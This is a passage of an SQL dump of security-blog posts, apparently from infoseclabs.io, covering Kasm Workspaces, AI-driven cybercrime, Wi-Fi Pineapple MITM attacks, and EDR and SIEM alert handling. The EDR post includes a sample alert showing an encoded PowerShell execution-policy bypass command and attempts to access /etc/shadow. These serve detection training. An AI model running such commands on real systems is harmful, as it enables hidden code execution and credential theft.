offers a robust and efficient solution.\n\n### Benefits for Cybersecurity Professionals\n\nFor cybersecurity professionals, Kasm Workspaces checks several critical boxes:\n\n- **Secure Environments:** Create isolated containers to analyze threats, execute potentially malicious files, or browse the web securely without risk to host machines.\n\n- **Lightweight and Scalable:** Unlike resource-heavy VMs, Kasm Workspaces\' containerized approach provides flexibility without high hardware requirements.\n\n- **Centralized Management:** Manage multiple workspaces, configurations, and users from a single dashboard effortlessly.', '', 'http://infoseclabs.io/uploads/1767482767599-980252455.png', NULL, 1, 'published', '2026-01-03 02:26:00', '2026-01-05 00:33:14', 'Projects', 'Kasm Workspaces: Setup Guide for Cybersecurity Pros', 'Discover how Kasm Workspaces enhances cybersecurity home labs with secure, scalable, containerized environments.', 'Kasm Workspaces'),
(7, 'The Rise of AI in Cybercrime: Understanding the Threats and Defenses', 'the-rise-of-ai-in-cybercrime-understanding-the-threats-and-defenses', '# The New Frontier: AI-Powered Cyberattacks\n\nThe rapid advancements in artificial intelligence (AI) have revolutionized industries by streamlining processes and creating new opportunities. However, along with its many benefits, AI has also opened a new frontier for cybercriminals. Hackers increasingly leverage machine learning and AI tools to enhance their cyberattacks, making them more sophisticated, effective, and harder to detect.\n\nThis blog delves into how AI is reshaping the cyberattack landscape, provides real-world examples, and offers actionable strategies to defend against this growing threat. If you\'re concerned about how AI is influencing cybersecurity, you\'re in the right place.\n\n## How AI Enhances Cyberattacks\n\nAI adds a dangerous layer of automation, precision, and deception to cyberattacks. Here are some ways hackers are weaponizing machine learning to exploit vulnerabilities.\n\n### Automated Vulnerability Detection\n\nHackers often need to identify weaknesses in a system to stage their attacks. Traditional methods of scanning for vulnerabilities are manual and time-consuming. However, with AI, cybercriminals can now automate this process, allowing them to find weak points in networks, software, or applications much faster.\n\nAI-powered tools analyze large datasets to identify exploitable vulnerabilities and leverage predictive analytics to determine the likelihood of specific attacks succeeding, helping hackers optimize their targets effectively.\n\nFor example, AI can detect unpatched software versions, misconfigured firewalls, or even analyze encryption keys to uncover weaknesses. This automation enables attackers to plot cyberattacks on a scale never seen before.\n\n### Advanced Phishing Campaigns\n\nPhishing, a form of cyberattack where hackers pretend to be legitimate entities to trick users into revealing sensitive information, has been around for years. However, AI has supercharged phishing schemes to become more indistinguishable from real correspondence.\n\nMachine learning enables cybercriminals to create hyper-personalized phishing messages by analyzing social media profiles, email conversations, and public records. AI can craft well-written, contextually appropriate emails that users are far more likely to click on, making these phishing attempts nearly impossible to detect using traditional filters.\n\nAccording to recent studies, 91% of all cyberattacks begin with a phishing email. Now, AI is increasing both the sophistication and authenticity of these scams, putting organizations at greater risk.\n\n### Evasive Malware and Polymorphism\n\nOne of the most dangerous aspects of AI in cyberattacks is the creation of evasive malware. AI-powered malware continuously reconfigures itself to evade detection by security software.\n\nPolymorphic malware, for instance, uses AI to generate new versions of itself with minor variations in its code. These changes render detection tools like signature-based antiviruses obsolete because they cannot recognize new iterations.\n\nWhat\'s worse, AI-powered malware can actively \"learn\" from its environment, adapting its behavior in real-time to avoid detection. It can analyze which types of actions trigger alerts and modify its activity accordingly, ensuring it stays under the radar longer.\n\n## Real-World Examples of AI-Powered Attacks\n\nAI-powered cyberattacks are no longer just hypothetical. They have already made their mark in the real world, with several alarming examples surfacing in recent years.\n\n1. **Deepfake Impersonation Scams**  \n   Hackers have used AI-generated deepfake audio to impersonate company executives. For instance, in 2019, cybercriminals used deepfake technology to mimic the voice of a CEO, convincing an employee to transfer $243,000 to a fraudulent bank account.\n\n2. **AI-Enhanced Credential Stuffing**  \n   Credential stuffing involves hackers attempting to gain access by leveraging usernames and passwords leaked from previous data breaches. AI can enhance these attacks by using machine learning to test stolen credentials across hundreds of platforms, identifying successful logins faster than human hackers could.\n\n3. **Sophisticated Chatbot Scams**  \n   Malicious chatbots powered by AI have been deployed to scam unsuspecting users. These bots can impersonate company representatives, tricking users into providing sensitive information or downloading harmful files.\n\nThese examples demonstrate the deadly potential of AI in the hands of hackers. But what can organizations do to defend themselves?\n\n## Defending Against AI Cyberattacks\n\nWhile the rise of AI-powered cyberattacks is alarming, the good news is that AI is also a powerful ally in cybersecurity. Here’s how organizations can leverage AI to stay one step ahead of attackers.\n\n### AI-Driven Threat Detection Systems\n\nSecurity systems powered by AI are vital in detecting and stopping advanced threats. These systems can process and analyze vast amounts of data in real-time, uncovering patterns or anomalies that traditional tools might miss.\n\nFor example, AI systems like CrowdStrike and Darktrace continuously monitor network traffic for suspicious activity. When a system behaves unusually, such as a sudden spike in outbound data transfers, these tools can flag it and take automated actions to mitigate threats.\n\nAdditionally, AI can provide early warnings about potential attacks by analyzing global cybersecurity trends, enabling organizations to prepare proactive defenses.\n\n### Behavioral Analysis and Anomaly Detection\n\nTraditional cybersecurity methods often rely on static rules, making them susceptible to dynamic threats like AI-powered polymorphic malware. AI solves this problem through behavioral analysis and anomaly detection.\n\nInstead of focusing only on known threat signatures, AI tools observe normal patterns of behavior within a system. Any deviation from the norm triggers alerts, even if the activity doesn’t match a known attack signature.\n\nFor example, if malware disguised as a legitimate application suddenly starts accessing sensitive files, an AI-based security system would flag this as suspicious and isolate the application before any damage is done.\n\n### Proactive Security Measures and Threat Intelligence\n\nThe key to defending against AI-powered cyberattacks is staying ahead of evolving threats. Organizations need to adopt proactive measures like penetration testing, threat simulations, and regular software updates.\n\nThreat intelligence platforms powered by AI can help businesses identify vulnerabilities before hackers do. These platforms scour the dark web, stay updated on newly discovered exploits, and provide actionable recommendations for patching weak spots.\n\nBy continuously improving their defenses and staying informed about emerging threats, businesses can significantly minimize the risks posed by AI-enhanced cyberattacks.\n\n## The Future of Cybersecurity in the Age of AI\n\nAI is rapidly transforming cybersecurity from both an offensive and defensive standpoint. While hackers will continue to exploit AI to create sophisticated cyberattacks, the same technology offers powerful solutions to thwart them.\n\nThe best way forward is for businesses and organizations to adopt AI-driven cybersecurity tools, invest in advanced threat intelligence systems, and remain vigilant in updating their defenses. When used responsibly, AI isn’t just a challenge to overcome; it’s the key to staying ahead in an increasingly complex digital world.\n\nTo safeguard your organization against AI-powered cyber threats, start exploring AI-driven cybersecurity solutions today. The future of digital safety depends on your readiness to adapt and protect.', '', 'http://infoseclabs.io/uploads/1767499156712-998648028.png', NULL, 1, 'published', '2026-01-07 02:58:00', '2026-01-07 18:18:38', 'Information Security', 'AI-Powered Cyberattacks: Hackers & Machine Learning', 'Discover how AI is transforming cyberattacks and learn strategies to protect against these sophisticated threats.', 'AI cyberattacks'),
(8, 'Security Tools vs. Manual Investigation: Building a Balanced Cybersecurity Professional', 'security-tools-vs-manual-investigation-building-a-balanced-cybersecurity-professional', '# Balancing Tools and Manual Skills in Cybersecurity\n\nCybersecurity is one of the most dynamic fields in the modern workforce, where threats evolve as quickly as the technology designed to counter them. This creates a significant challenge for cybersecurity professionals to continuously refine their skills and adapt to new methodologies. A long-standing debate in the field centers around whether professionals should focus on mastering security tools or prioritize honing their manual investigation skills.\n\nThe truth is, to become a well-rounded cybersecurity professional, it\'s not about choosing between the two but striking the right balance. This blog will explore the strengths and limitations of relying on tools, the irreplaceable value of manual investigation, and how blending these approaches can prepare you to thrive in this fast-paced field.\n\n## The Role of Security Tools in Cybersecurity\n\nSecurity tools are indispensable for automating complex tasks, ensuring faster detection and response, and providing organizations with a robust line of defense. Today\'s advanced tools have revolutionized cybersecurity by adding scalability, speed, and near real-time insights.\n\n### Key Tools Empowering Cybersecurity Professionals\n\n1. **Security Information and Event Management (SIEM):** SIEM tools such as Splunk and IBM QRadar analyze logs and events across an organization\'s IT environment, providing centralized visibility over network activity.\n2. **Intrusion Detection and Prevention Systems (IDS/IPS):** Tools like Snort and Suricata scan for suspicious traffic patterns to prevent network intrusions.\n3. **Vulnerability Scanners:** Solutions like Nessus and Rapid7 Nexpose identify weak points in your network that attackers might exploit.\n4. **Endpoint Detection and Response (EDR):** Tools like CrowdStrike and SentinelOne monitor endpoint behavior to detect anomalies and prevent breaches.\n\n### Benefits of Security Tools\n\nSecurity tools bring speed and efficiency to tasks that would take hours or even days if performed manually. They excel at:\n\n- **Threat Detection:** Automating the detection of malware or unusual activity, greatly reducing response times.\n- **Log Management:** Consolidating log data from multiple sources for easier monitoring.\n- **Reducing Errors:** Tools minimize human errors by providing consistent, algorithm-based processes.\n- **Scalability:** Tools handle large datasets and adapt to growing organizations with minimal additional labor.\n\nHowever, as powerful as these tools are, their limitations mean they can\'t be the sole focus for cybersecurity professionals.\n\n## The Importance of Manual Investigation Skills\n\nSecurity tools cannot replace the expertise, critical thinking, and intuition of a human investigator. Their reliance on predefined rules and algorithms makes them vulnerable to bypasses, misconfiguration, or outright failures.\n\n### Core Manual Investigation Techniques\n\n1. **Log Analysis:** Reviewing raw data from logs can uncover nuanced patterns and anomalies that automated tools may miss.\n2. **Network Traffic Analysis:** Manually inspecting network packets with tools like Wireshark helps you understand intricate details about suspicious traffic.\n3. **Malware Analysis:** Analyzing malicious files through static and dynamic means (e.g., decompiling code or sandbox testing) can help determine their capabilities and origins.\n4. **Behavioral Analysis:** Looking for deviations from expected behavior within user or system interactions often requires human insight.\n\n### Why Manual Skills Matter\n\n- **Complex Threats:** Cyberattacks are becoming increasingly sophisticated, and manual analysis is often required to understand advanced tactics, techniques, and procedures (TTPs).\n- **False Positives:** Over-reliance on tools can lead to missed legitimate activity being misclassified as malicious or vice versa. Human judgment is vital for distinguishing between the two.\n- **Incident Response:** When tools fail or are rendered inoperable by attackers, skilled cybersecurity professionals step in to contain, investigate, and resolve issues.\n\nBy investing in manual skills, professionals not only enhance their problem-solving capabilities but also ensure that their expertise remains irreplaceable.\n\n## Striking a Balance Between Tools and Manual Expertise\n\nThe ultimate goal for cybersecurity professionals is not about choosing one approach over the other but knowing when and how to combine both effectively. Here\'s why a blended approach works best:\n\n- **Efficiency with Tools:** Tools save time by automating repetitive tasks, letting professionals focus their manual expertise on more intricate issues.\n- **Human Judgment as a Safety Net:** Professionals must validate and interpret the data generated by tools to avoid decision-making based on incomplete or misleading information.\n- **Incident Adaptability:** While tools operate by predefined rules, humans can creatively adapt to situations.\n\nBy using security tools as extensions of their own ability—not replacements for it—professionals can maximize their impact.\n\n## Incident Response Scenario\n\nImagine this scenario: Your Security Information and Event Management (SIEM) system, which usually alerts your team of potential intrusions, has failed due to a technical error. At the same time, one of your endpoints begins acting suspiciously, potentially signaling a breach. What do you do?\n\n**Step 1 – Activate the Incident Response Plan:**\n\nInitiate the pre-established incident response plan (IRP). Begin by identifying the team members who need to be involved and delegating tasks to ensure a structured approach.\n\n**Step 2 – Collect Logs and Evidence:**\n\nSince the SIEM system is down, manually retrieve event logs from key systems (e.g., network firewalls, servers, and endpoint devices). Verify any discrepancies or unusual activity.\n\n**Step 3 – Conduct a Manual Investigation:**\n\nUse tools like Wireshark to manually analyze network traffic from suspicious endpoints. Perform behavioral analysis to identify patterns of attack.\n\n**Step 4 – Contain and Mitigate:**\n\nIsolate impacted systems from your network to prevent escalation. Apply containment measures, such as endpoint quarantine or restricting user permissions.\n\n**Step 5 – Eradication and Recovery:**\n\nRemove the threat manually by using advanced techniques like malware removal tools or system rollbacks. Restore all systems to their functional state and monitor them for lingering threats.\n\nThis scenario highlights how security tools provide convenience but how manual investigation remains critical when tools fail.\n\n## Best Practices for Professional Development\n\nTo become an effective cybersecurity professional capable of balancing tools and manual skills, consider the following:\n\n- **Certifications and Training:**', '', 'http://infoseclabs.io/uploads/1767499299723-760685997.png', NULL, 1, 'draft', '2026-01-09 11:01:00', '2026-01-04 07:02:42', 'Information Security', 'Security Tools vs. Manual Skills: Cybersecurity Balance', 'Discover how to balance security tools and manual investigation skills for a comprehensive cybersecurity approach.', 'Cybersecurity Balance'),
(9, 'Wi-Fi Pineapple: A Comprehensive Guide to Network Security and Threat Prevention', 'wi-fi-pineapple-a-comprehensive-guide-to-network-security-and-threat-prevention', '# Understanding Wi-Fi Pineapple: A Cybersecurity Perspective\n\nWhen you hear the term \"Wi-Fi Pineapple,\" you might picture a tropical fruit connected to your network. However, in the cybersecurity world, this device is far from sweet. Wi-Fi Pineapples are powerful tools designed for network auditing, but in the wrong hands, they can be used for malicious purposes.\n\nThis blog will break down what a Wi-Fi Pineapple is, how it works (with a focus on MITM attacks), real-world scenarios where these devices have been exploited, and effective security measures to protect yourself. By the end, you\'ll have a deeper understanding of this tool and how to stay one step ahead of potential attackers.\n\n## What Is a Wi-Fi Pineapple?\n\nA Wi-Fi Pineapple is a device created by Hak5, a company known for its ethical hacking training tools. Originally built to assist network administrators and penetration testers, the Pineapple allows users to monitor, analyze, and test wireless networks.\n\nEssentially, it acts as a device that can simulate rogue Wi-Fi networks and mimic legitimate access points (APs). It can capture data, intercept information, and probe vulnerabilities in a network’s security framework. While its ethical use is significant in network auditing and cybersecurity testing, these devices can also be exploited by hackers for nefarious purposes.\n\n## How Wi-Fi Pineapple Works: Man-in-the-Middle (MITM) Attacks Explained\n\nOne of the most dangerous features of the Wi-Fi Pineapple is its ability to facilitate a **man-in-the-middle (MITM) attack** seamlessly. Here’s how it works:\n\n### Step 1: Mimicking Legitimate Wi-Fi Networks\n\nWi-Fi Pineapples scan the area for Wi-Fi AP names and automatically respond to connection requests. Many unsuspecting devices, such as laptops and smartphones, are programmed to automatically reconnect to familiar Wi-Fi names (e.g., \"Starbucks_Free_WiFi\"). The Pineapple responds as the “strongest” signal impersonating that AP.\n\n### Step 2: Capturing Data\n\nWhen a victim connects to the Pineapple, their internet traffic can be intercepted. Attackers can collect sensitive data such as login credentials, session cookies, and even browsing activity.\n\n### Step 3: Deploying Attacks\n\nDuring MITM attacks, bad actors can:\n\n- Redirect users to malicious websites to steal information.\n- Inject malware into HTTP traffic.\n- Uncover intricate details of unencrypted connections.\n\nThe result? Your personal and professional data is captured without your knowledge, and in unsecured networks, this risk skyrockets.\n\n## Different Wi-Fi Pineapple Models and Their Features\n\nHak5 currently offers several models of Wi-Fi Pineapple devices, catering to both beginner and advanced users. Below are the most popular models:\n\n### 1. Wi-Fi Pineapple Nano\n\n- Portable yet powerful\n- Best for on-the-go network assessments\n- Budget-friendly, making it accessible to beginners\n\n### 2. Wi-Fi Pineapple Tetra\n\n- Dual radio capabilities\n- Handles multiple wireless clients simultaneously\n- Perfect for advanced penetration testing setups\n\n### 3. Enterprise Solutions\n\n- High-level auditing programs customized for corporate needs\n- More security and control for ethical usage\n\nEach model includes rich features like packet sniffing, victim profiling, and additional plugins to enhance adaptability. However, these tools also make them dangerous if exploited.\n\n## Real-World Scenarios of Pineapple Attacks\n\nWi-Fi Pineapples pose significant threats to any environment where Wi-Fi is accessible. Here are real-world examples to illustrate how they’ve been used:\n\n### 1. Coffee Shop Surveillance\n\nA cybercriminal sits in a coffee shop with their Wi-Fi Pineapple. As customers connect to what they believe is the café\'s free Wi-Fi, the attacker intercepts login credentials for banking apps and social media platforms.\n\n### 2. Corporate Espionage\n\nAttackers impersonate a secure office network, tricking employees into connecting to their rogue AP. This enables the attacker to exfiltrate sensitive corporate data.\n\n### 3. Conference Exploits\n\nLarge public events such as tech conferences present easy targets. Attendees connect to what they think is the event Wi-Fi. Hackers use Pineapples to inject malicious programs or monitor unencrypted emails.\n\nThese examples indicate how a seemingly innocuous device can disrupt personal security and corporate networks alike.\n\n## Best Practices for Protection: Security Measures and Tools\n\nFortunately, you can protect yourself and your organization from Wi-Fi Pineapple-enabled attacks. Implement the following best practices:\n\n### 1. Avoid Public Wi-Fi Whenever Possible\n\nPublic networks lack security and make you vulnerable to rogue APs. Use your mobile hotspot or a known secure network instead.\n\n### 2. Use a VPN\n\nA Virtual Private Network (VPN) encrypts your internet traffic. Even if an attacker intercepts it, they won’t be able to decipher sensitive data.\n\n### 3. Beware of Rogue APs\n\nTurn off auto-connect to networks in your device’s settings. Manually verify the legitimacy of Wi-Fi networks before connecting.\n\n### 4. Enable HTTPS\n\nEnsure that every website you visit uses HTTPS encryption. Tools like HTTPS Everywhere (a browser extension) enforce this, creating a secure connection.\n\n### 5. Add Strong Endpoint Protection\n\nInstall antivirus and antimalware programs across your devices. Many endpoint security tools alert you to suspicious activity initiated by MITM tactics.\n\n### 6. Educate Employees\n\nFor businesses, invest in cybersecurity awareness training. Equip employees to recognize phishing schemes and rogue AP strategies.\n\n### 7. Use MAC Address Filtering\n\nOn sensitive networks, permit access only to known devices using MAC address filtering. While not foolproof, it’s another layer of security.\n\nBy following these tactics, individuals and companies can significantly reduce vulnerabilities.\n\n## The Future of Wi-Fi Security and Pineapple Devices\n\nWhile devices like the Wi-Fi Pineapple are unlikely to disappear anytime soon, advancements in network security continue to evolve:\n\n- **Wi-Fi 6 Encryption**: New standards, such as WPA3 in Wi-Fi 6, aim to improve encryption and prevent data sniffing.\n- **AI-Driven Security**: Automated threat detection using artificial intelligence can monitor network traffic in real-time for suspicious activities.\n\nThese advancements promise a more secure future in the face of evolving threats.', '', 'http://infoseclabs.io/uploads/1767499500376-718819269.png', NULL, 1, 'published', '2026-01-06 11:04:00', '2026-01-08 01:43:04', 'Projects', 'Protect Yourself from Wi-Fi Pineapple Attacks', 'Learn how to safeguard against Wi-Fi Pineapple attacks with effective security measures and insights into MITM threats.', 'Wi-Fi Pineapple'),
(10, 'Top EDR Alerts Every Organization Encounters and How to Handle Them', 'top-edr-alerts-every-organization-encounters-and-how-to-handle-them', '# Understanding Endpoint Detection and Response (EDR) Alerts\n\nEndpoint Detection and Response (EDR) is a critical component of modern cybersecurity strategies. With the rise of sophisticated cyber threats targeting endpoints such as laptops, servers, and mobile devices, EDR tools help detect, analyze, and respond to potential risks in real-time. However, managing EDR alerts can often feel overwhelming due to the sheer volume of notifications generated in an enterprise environment.\n\nThis post explores the most common categories of EDR alerts, provides examples of key alerts organizations typically encounter, and shares best practices for analyzing, prioritizing, and responding effectively. Whether you\'re a security analyst working in a SOC or an IT professional overseeing endpoint security, this guide will help you navigate the EDR alert landscape with confidence.\n\n## Why EDR Alerts Matter\n\nWhy are EDR alerts so critical to an organization\'s security posture? Simply put, endpoints are common entry points for attackers. Malicious actors often use techniques such as phishing emails, malware, or compromised credentials to gain access to endpoints before moving laterally across a network.\n\nEDR tools monitor endpoint activities, log suspicious behaviors, and send alerts when potential threats are detected. These alerts highlight risks such as malware infections, unauthorized file access, and anomalous network behavior. Ignoring or mismanaging these alerts could allow attackers to escalate their operations undetected, causing significant damage to your business.\n\n## Common EDR Alert Categories\n\nTo efficiently manage EDR alerts, it’s important to first understand their key categories. These alerts typically fall under the following types:\n\n### Malware Detection\n\nAlerts related to known or suspected malware activity, such as ransomware, trojans, or spyware. These often stem from signature-based detections or anomalous behaviors.\n\n### Suspicious Process Execution\n\nAlerts generated when an unusual or unauthorized process runs on an endpoint. Examples include PowerShell abuse or launching a process from unexpected directories.\n\n### Unusual User Behavior\n\nBehavioral anomalies such as a user accessing sensitive data at unusual hours or failed login attempts from unfamiliar locations often trigger alerts.\n\n### File Integrity Variations\n\nActivities such as unauthorized changes, additions, or deletions of critical system files or registries send file integrity alerts. These can indicate attempts to tamper with systems.\n\n### Network Anomalies\n\nUnusual traffic patterns between endpoints or outbound connections to suspicious external IP addresses result in network-related alerts.\n\n### Privilege Escalation Attempts\n\nAlerts flag actions where a user or process attempts to gain elevated access privileges without authorization.\n\n## Top EDR Alert Examples\n\nLet\'s take a closer look at specific EDR alert examples and their significance in an enterprise security environment.\n\n### Example 1: Ransomware Behavior Detected\n\n- **Alert Description**: Files are being renamed with “.encrypted” extension, indicating potential ransomware activity.\n- **Details**:\n  - Process Name: `encryptor.exe`\n  - Detected Behavior: Mass file encryption in user directories.\n  - Host Machine: `Workstation-22`\n- **Action Required**:\n  - Isolate the endpoint immediately.\n  - Identify the ransomware strain and retrieve backups.\n  - Perform a root-cause analysis to prevent recurrence.\n\n### Example 2: PowerShell Command-Line Anomaly\n\n- **Alert Description**: Unusual PowerShell script execution detected on server.\n- **Details**:\n  - Command Line Argument: `powershell -exec bypass -enc [Base64 encoded payload]`\n  - User Account: `admin_temp`\n  - Timestamp: `2024-03-14 11:23 PM`\n- **Action Required**:\n  - Investigate execution context and user activity.\n  - Reverse engineer the encoded payload to detect malicious intent.\n\n### Example 3: Unauthorized Administrator Access\n\n- **Alert Description**: A non-admin user attempted to access privileged directories.\n- **Details**:\n  - Affected Directory: `/etc/shadow`\n  - Failed Logins Detected: 5 attempts\n  - Source IP Address: `192.168.1.45`\n- **Action Required**:\n  - Lock the user\'s account temporarily.\n  - Analyze source IP activity for brute-force attack patterns.\n\n### Example 4: Outbound Connection to Known Malicious IP\n\n- **Alert Description**: Host attempted to contact a blacklisted external IP address.\n- **Details**:\n  - (Further details would be provided here, but they were cut off in the original content.)\n\nUnderstanding these alerts and their implications can significantly enhance an organization\'s ability to protect its network infrastructure. Properly responding to EDR alerts ensures that potential threats are mitigated swiftly, reducing the risk of significant breaches.', '', 'http://infoseclabs.io/uploads/1767499662544-499873320.png', NULL, 1, 'draft', '2026-01-10 11:06:00', '2026-01-04 07:08:00', NULL, 'Top EDR Alerts & Solutions for Organizations', 'Discover common EDR alerts and learn effective strategies to manage and respond to them, ensuring robust endpoint security.', 'EDR Alerts');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(11, 'Mastering SIEM Alerts: A Guide to Effective Management and Optimization', 'mastering-siem-alerts-a-guide-to-effective-management-and-optimization', '# Understanding and Managing SIEM Alerts\n\nSecurity Information and Event Management (SIEM) systems are foundational tools in modern cybersecurity. They provide critical insights into an organization\'s environment by collecting, analyzing, and prioritizing data from various sources. However, one of the main challenges for security analysts and Security Operations Center (SOC) teams is managing the sheer volume of alerts generated daily.\n\nThis post explores the most common SIEM alerts organizations encounter, including examples of critical alerts and how to prioritize, manage, and optimize your SIEM system effectively.\n\n## What Are SIEM Alerts and Why Are They Important?\n\nSIEM alerts are notifications generated by a SIEM system when it detects activity that matches preconfigured rules or anomalies in the monitored environment. These alerts help security teams address potential threats swiftly, thereby minimizing risks to the organization.\n\n### Why SIEM Alerts Matter\n\n- **Real-Time Threat Detection**: Alerts identify security incidents like network intrusions or unauthorized access as they occur.\n- **Less Downtime**: Early warning systems reduce the time to resolve critical vulnerabilities.\n- **Compliance**: SIEM tools help organizations meet regulatory requirements by providing detailed logging and reporting.\n\nWithout proper alert management, these tools can easily overwhelm teams with noise, making it challenging to differentiate true cyber threats from false positives.\n\n## Common Types of SIEM Alerts Organizations Receive\n\nSIEM systems can monitor a wide range of events, but certain types of alerts are more prevalent across organizations. Below are some categories that security analysts commonly encounter:\n\n### 1. Failed Login Attempts\n\n- **Why It Happens**: A user attempts to log in multiple times with incorrect credentials.\n- **Risk**: This often indicates a brute-force attack or an insider threat attempting unauthorized access.\n- **Example**: Multiple failed logins across different accounts within a short time frame.\n\n### 2. Unusual User Behavior\n\n- **Why It Happens**: A user deviates from their normal login patterns (e.g., accessing resources at odd hours).\n- **Risk**: A compromised account or insider threat.\n- **Example**: An employee who typically works in New York is suddenly logging in from an IP address in Eastern Europe at 3 AM.\n\n### 3. Malware Detection\n\n- **Why It Happens**: Malware signatures are detected on a workstation or server.\n- **Risk**: The malware could spread laterally across networks and exfiltrate data.\n- **Example**: A SIEM tool picks up logs from your antivirus software indicating the presence of files matching known ransomware hashes.\n\n### 4. Privilege Escalation Attempts\n\n- **Why It Happens**: Users or processes attempt to gain administrative privileges.\n- **Risk**: Privilege escalation is often an early step in more complex attacks like ransomware.\n- **Example**: A standard user suddenly tries to execute administrative commands without prior approval.\n\n### 5. Data Exfiltration\n\n- **Why It Happens**: Large volumes of sensitive data are transferred outside the organization’s internal network.\n- **Risk**: A clear sign of insider threats or external breaches.\n- **Example**: A file server sending gigabytes of data to an unknown external IP over a short duration.\n\n### 6. Unauthorized Access to Critical Systems\n\n- **Why It Happens**: Access attempts to systems housing sensitive data outside of permissible roles or hours.\n- **Risk**: A sign of malicious insider activity or an attacker leveraging stolen credentials.\n- **Example**: A user account attempts to access a database server containing financial records without prior authorization.\n\n### 7. Denial-of-Service (DoS) Attack Indicators\n\n- **Why It Happens**: A spike in network traffic results in a server becoming unresponsive.\n- **Risk**: Disruption of operations, affecting customer experience and internal workflows.\n- **Example**: Your SIEM correlates logs pointing to unusually high traffic originating from multiple IP addresses targeting a single web server.\n\n### 8. Suspicious File Modifications\n\n- **Why It Happens**: Critical system files are unexpectedly modified.\n- **Risk**: Could indicate ransomware encrypting files or malware embedding payloads.\n- **Example**: Unauthorized changes to key registry settings or .bat and .dll files.\n\nEach of these alerts represents distinct threats that require prompt investigation and action. However, not all alerts are created equal, and some demand more immediate attention than others.\n\n## How to Effectively Manage and Prioritize SIEM Alerts\n\nManaging SIEM alerts is like trying to sip from a firehose; you need a strategy to get the good out of it without being drowned by excessive information. Here’s how you can effectively manage and prioritize alerts:\n\n1. **Categorize Alerts by Severity**\n   - Divide alerts into categories such as critical, high, medium, and low based on the level of potential risk.\n   - For example, failed login attempts might be \"low priority\" unless they are widespread, while detected ransomware is \"critical.\"\n\nBy understanding and categorizing alerts effectively, security teams can focus on the most significant threats and ensure timely responses to protect their organizations.', '', 'http://infoseclabs.io/uploads/1767501764296-302552087.png', NULL, 1, 'published', '2026-01-06 07:43:00', '2026-01-06 16:10:10', 'Information Security', 'Top SIEM Alerts Organizations Face', 'Discover common SIEM alerts, their impact, and strategies to manage them effectively for enhanced cybersecurity.', 'SIEM alerts'),
(12, 'How Cyber Threats Infiltrate: Insight into Digital Security Risks', 'how-cyber-threats-infiltrate-insight-into-digital-security-risks', '# Navigating the Digital Threat Landscape\n\nThe digital world is buzzing with activity. Everywhere we go, invisible connections through Wi-Fi, Bluetooth, and other technologies surround us. However, lurking within that mix are sneaky cyber threats waiting for an opportunity to strike. Understanding how hackers exploit vulnerabilities in our digital lives is key to staying ahead of them.\n\nThis blog dives into common threat vectors and attack surfaces, breaking down how cyber threats operate and, more importantly, how you can protect yourself.\n\n## The Sneaky World of Threat Vectors\n\n### Messages as a Gateway\n\nMessages might seem harmless, but they can open doors for hackers. Emails, for example, are one of the oldest and most common ways attackers exploit our trust in digital communication.\n\n- **Phishing** works by tricking users into clicking malicious links or sharing sensitive information, often by imitating trusted sources like banks or tax authorities.\n- **Smishing** is the SMS version of phishing, where attackers send texts posing as delivery companies or other trusted entities, aiming to con you into revealing private details or downloading malware.\n- Even **instant messaging apps** with better security measures like end-to-end encryption aren\'t immune. Hackers may use infected files or social engineering tactics to compromise users.\n\n### Images Aren’t Always Innocent\n\nThink that image file is harmless? Think again. Hackers embed malicious code into image files, turning them into digital Trojan horses. Once opened, these files can trigger harmful actions like releasing ransomware or stealing your data.\n\n### Files Are Dangerous When Tampered With\n\nEvery file exchanged online, from documents to spreadsheets, could potentially carry malicious software. When you open an infected file, attackers can exploit weaknesses in your device to steal data, take over your system, or launch other forms of attack.\n\n### Voice Calls Can Be a Threat\n\nPhones haven\'t escaped the reach of cybercriminals. **Vishing** (voice phishing) tricks unsuspecting individuals by using caller ID spoofing to look like legitimate entities, such as your bank. Through convincing conversations, attackers aim to extract sensitive details like passwords or financial data.\n\n### Your USB Could Be a Trap\n\nUSB drives might seem innocuous, but they can act as digital landmines. Plugging in a tampered USB stick can spread malware to your system. Sometimes, hackers leave infected drives in public places, counting on curiosity to do the rest.\n\n## Vulnerable Software: An Open Invitation for Hackers\n\nOld or unpatched software is like having holes in the walls of your digital fortress. Vulnerabilities in software—from coding errors to outdated versions without security updates—can be exploited, enabling attackers to breach systems and steal sensitive data.\n\nOrganizations must regularly manage updates and patches to seal these vulnerabilities. Tools like **vulnerability scanners** proactively identify and address these gaps before hackers can exploit them.\n\n### Agent-Based vs. Agentless Scanning\n\n- **Agent-Based Scanning** installs software on devices to detect vulnerabilities and report them back to a central server.\n- **Agentless Scanning** requires no software installation but uses tools like Nmap and Wireshark to remotely scan systems.\n\nHackers often favor agentless methods for reconnaissance since they leave no traces, underscoring the need for organizations to scan their systems first.\n\n## Key Takeaways to Stay Secure\n\nUnderstanding how hackers exploit vulnerabilities allows you to stay vigilant and build strong defenses. Here are some tips to protect yourself online:\n\n- Always verify messages before clicking links or sharing information.\n- Use security software to detect hidden malicious code in files and images.\n- Keep all software up-to-date to patch vulnerabilities.\n- Never plug in USB drives you find in public places.\n- Be cautious of phone calls from unverified sources, even if they appear familiar.\n\nCybercriminals are constantly evolving their tactics, but with proactive measures, you can safeguard your digital life from their threats.', '', 'http://infoseclabs.io/uploads/1767560795113-590336718.png', NULL, 1, 'published', '2026-01-04 16:06:00', '2026-01-05 00:07:33', 'Information Security', 'How Cyber Threats Infiltrate Digital Security', 'Explore how cyber threats operate and learn strategies to protect yourself from digital security risks.', 'Cyber Threats'),
(13, 'Breaking Into Cybersecurity: A Realistic Guide for Aspiring Professionals', 'breaking-into-cybersecurity-a-realistic-guide-for-aspiring-professionals', '# Breaking into Cybersecurity: A Realistic Guide\n\nEntering the field of cybersecurity is one of the most exciting career paths in technology, but it’s not without its challenges. Many aspiring professionals start with the misconception that simply studying cybersecurity concepts, watching tutorials, or earning certificates will guarantee them a high-paying job in just a few months. While some may stumble upon opportunities, for most, the reality is far more demanding. This blog post will break down the common missteps and guide you on how to effectively pave your way into the cybersecurity world.\n\n## The Problem with \"Study-Only\" Approaches\n\nOne of the biggest mistakes beginners make is focusing solely on learning concepts from college courses, books, or tutorials without applying them. Memorizing cybersecurity principles may give you a theoretical understanding, but it doesn’t equate to the hands-on experience that employers are looking for.\n\nThis phenomenon can leave you in what’s called \"learning purgatory.\" You might know all the right terminology and theories, but you’ll stumble when it’s time to apply your knowledge in a real-world scenario.\n\n**Reality check:** To stand out in interviews and secure your first cybersecurity role, you must demonstrate practical, hands-on 